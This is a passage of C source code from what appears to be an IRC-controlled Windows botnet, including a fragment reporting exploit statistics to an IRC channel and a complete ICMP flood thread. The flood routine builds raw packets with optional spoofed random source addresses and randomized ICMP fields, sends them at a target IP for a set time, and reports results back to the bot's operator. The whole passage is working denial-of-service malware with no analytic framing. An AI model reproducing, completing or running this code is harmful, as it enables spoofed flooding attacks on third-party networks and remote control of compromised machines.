irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
icmpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
static ECHOREQUEST echo_req;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
if (finet_addr(icmpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[ICMP]: Invalid target IP.");
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
echo_req.ipHeader.ident=1;
echo_req.ipHeader.frag_and_flags=0;
echo_req.ipHeader.ttl=128;
echo_req.ipHeader.proto=IPPROTO_ICMP;
echo_req.ipHeader.checksum=0;
echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
echo_req.icmpHeader.type = rand()%256;
echo_req.icmpHeader.subcode = rand()%256;
echo_req.icmpHeader.id = (rand() % 240) + 1;
echo_req.icmpHeader.checksum = 0;
echo_req.icmpHeader.seq = 1;
//fill the packet data with a random character..
memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
